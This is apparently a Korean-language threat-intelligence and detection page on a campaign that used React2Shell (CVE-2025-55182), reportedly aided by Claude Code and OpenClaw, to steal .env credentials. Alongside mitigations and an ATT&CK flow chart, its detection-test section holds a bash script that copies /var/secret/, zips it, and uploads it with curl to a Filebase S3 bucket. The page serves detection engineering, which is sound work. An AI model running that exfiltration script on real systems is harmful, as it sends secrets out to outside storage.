팔로우 
요약
노출된 서버는 Bissa 스캐너 플랫폼, Claude Code 및 OpenClaw를 사용하여 React2Shell 취약점(CVE-2025-55182)을 통해 인터넷에 노출된 대상을 자동으로 공격하는 대규모 작전을 드러냈습니다. 이 캠페인은 AI, 클라우드, 결제 및 메시징 서비스의 고가치 자격 증명을 포함하는 수백만 개의 .env 파일을 수집했습니다. 수집된 데이터는 추가 사용을 위해 Filebase의 공개 S3 버킷에 업로드되었습니다. 이 작전은 금융, 암호화폐 및 소매 업종의 조직들을 표적으로 삼았습니다.
조사
분석가들은 스캔, 공격, 검증, 피해자 환경 우선순위화 워크플로를 보여주는 13,000개 이상의 파일을 복구했습니다. 로그는 React2Shell 익스플로잇을 사용한 900개 이상의 성공적인 침투를 확인했습니다. 텔레그램 봇은 실시간 경고 용도로 사용되어 각 타격을 피해자 세부 정보에 연결했습니다. 스캐너에는 WordPress W3 Total Cache 취약성(CVE-2025-9501) 모듈도 포함되어 있었지만 성공적인 공격은 관찰되지 않았습니다.
대책
취약한 애플리케이션 및 프레임워크, 특히 React2Shell 및 WordPress W3 Total Cache 구성 요소를 즉시 패치하십시오. .env 파일에서 비밀을 전용 시크릿 관리자로 이동하고 자격 증명을 정기적으로 회전하십시오. 클라우드 메타데이터 접근을 강화하고 최소 권한 RBAC를 시행하십시오. 외부 저장소 서비스로의 무단 업로드를 탐지하기 위해 전체 트래픽을 모니터링하십시오.
대응
CVE-2025-55182의 익스플로잇과 무단 S3 업로드에 대한 탐지 규칙을 구현하십시오. 알려진 악성 도메인과 텔레그램 봇 통신을 차단하십시오. 잔류 페이로드를 찾아 제거하기 위해 손상된 호스트에 대한 포렌식 분석을 수행하십시오. 영향을 받은 사용자를 통지하고 누출된 자격 증명을 즉시 회전하십시오.
“graph TB
%% Class definitions
classDef technique fill:#ffcc99
classDef tool fill:#cccccc
classDef action fill:#99ccff
classDef operator fill:#ff9900
%% Nodes
tool_bissa_scanner[“Tool – Name: Bissa scanner
Purpose: Perform massive active scanning using target feeds”]
class tool_bissa_scanner tool
tech_T1595_002[“Technique – T1595.002 Active Scanning: Vulnerability Scanning
Description: Scans Internet‑facing hosts to find vulnerable services”]
class tech_T1595_002 technique
tech_T1190[“Technique – T1190 Exploit Public‑Facing Application
Description: Exploits vulnerable web applications to gain initial access”]
class tech_T1190 technique
tool_react2shell[“Tool – Name: React2Shell (CVE‑2025‑55182)
Function: Provides remote code execution via crafted React payload”]
class tool_react2shell tool
tech_T1210[“Technique – T1210 Exploitation of Remote Services
Description: Executes payload on remote services to obtain code execution”]
class tech_T1210 technique
tech_T1211[“Technique – T1211 Exploitation for Defense Evasion
Description: Uses vulnerabilities to bypass defenses and stay hidden”]
class tech_T1211 technique
tech_T1552_001[“Technique – T1552.001 Unsecured Credentials: Credentials In Files
Description: Harvests credentials stored in configuration files such as .env”]
class tech_T1552_001 technique
tech_T1119[“Technique – T1119 Automated Collection
Description: Automates validation, prioritization, and batching of collected data for exfiltration”]
class tech_T1119 technique
tech_T1102_002[“Technique – T1102.002 Web Service: Bidirectional Communication
Description: Uses web services (Telegram bots) to exchange commands and data”]
class tech_T1102_002 technique
tool_telegram_bot[“Tool – Name: Telegram bots @bissapwned_bot, @bissa_scan_bot
Purpose: Command‑and‑control channel”]
class tool_telegram_bot tool
tech_T1567_002[“Technique – T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage
Description: Uploads stolen archives to cloud storage via web service”]
class tech_T1567_002 technique
tool_filebase_bucket[“Tool – Name: Filebase S3‑compatible bucket (bissapromax)
Purpose: Stores exfiltrated credential archives”]
class tool_filebase_bucket tool
tech_T1537[“Technique – T1537 Transfer Data to Cloud Account
Description: Moves data to an attacker‑controlled cloud account for later retrieval”]
class tech_T1537 technique
tech_T1068[“Technique – T1068 Exploitation for Privilege Escalation
Description: Leverages harvested credentials to gain higher privileges and lateral movement”]
class tech_T1068 technique
%% Connections
tool_bissa_scanner –>|performs| tech_T1595_002
tech_T1595_002 –>|identifies vulnerable services| tech_T1190
tech_T1190 –>|uses| tool_react2shell
tool_react2shell –>|delivers payload to| tech_T1210
tech_T1210 –>|enables| tech_T1211
tech_T1211 –>|allows| tech_T1552_001
tech_T1552_001 –>|feeds into| tech_T1119
tech_T1119 –>|sends data via| tech_T1102_002
tech_T1102_002 –>|implemented by| tool_telegram_bot
tech_T1102_002 –>|exfiltrates to| tech_T1567_002
tech_T1567_002 –>|stores in| tool_filebase_bucket
tool_filebase_bucket –>|enables| tech_T1537
tech_T1537 –>|supports| tech_T1068
“
공격 흐름
탐지
CVE-2025-55182 (React 서버 구성 요소의 비인증 RCE) 실행 시도 가능성 (웹 서버 통해)
보기
CVE-2025-55182 (React 서버 구성 요소의 비인증 RCE) 실행 시도 가능성 (프록시 통해)
보기
HTTP를 통한 직접 IP로의 비정상 포트 사용 C2 통신 가능성 (프록시 통해)
보기
S3-호환 Filebase로의 데이터 유출 [프록시]
보기
S3-호환 Filebase로의 데이터 유출 [AWS Cloudtrail]
보기
시뮬레이션 실행
전제 조건: Telemetry & Baseline Pre‑flight Check가 통과해야 합니다.
-
공격 설명 및 명령:
공격자는 기밀 문서 세트를 수집했으며,/var/secret/에서 감지를 피하기 위해 데이터를 암호로 보호된 ZIP 파일로 먼저 아카이브한 후,curl을 사용하여 기업 포워드 프록시을 통해 Filebase S3 엔드포인트에 직접 업로드합니다. 프록시는 전송되는 요청 URL 전체를 기록하며, 이는 탐지 규칙과 일치합니다. -
회귀 테스트 스크립트:
#!/usr/bin/env bash set -euo pipefail # 1️⃣ Stage data (T1074) STAGE_DIR="/tmp/staged_data" mkdir -p "$STAGE_DIR" cp -r /var/secret/* "$STAGE_DIR/" # 2️⃣ Archive data (T1560.001) – password protected zip ARCHIVE="/tmp/exfil_archive.zip" ZIP_PASSWORD="P@ssw0rd!" zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null # 3️⃣ Exfiltrate via Filebase S3 endpoint (T1020) # Assume the proxy is reachable at http://proxy.company.local:3128 FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip" curl -x http://proxy.company.local:3128 -T "$ARCHIVE" -H "Host: s3.filebase.com" -H "User-Agent: Mozilla/5.0" "$FILEBASE_URL" --silent --output /dev/null echo "Exfiltration attempt completed." -
정리 명령:
# 스테이지 파일 및 아카이브 제거 rm -rf /tmp/staged_data /tmp/exfil_archive.zip # (선택 사항) 필요 시 프록시 연결 초기화 # Squid의 경우: squid -k rotate echo "정리 완료."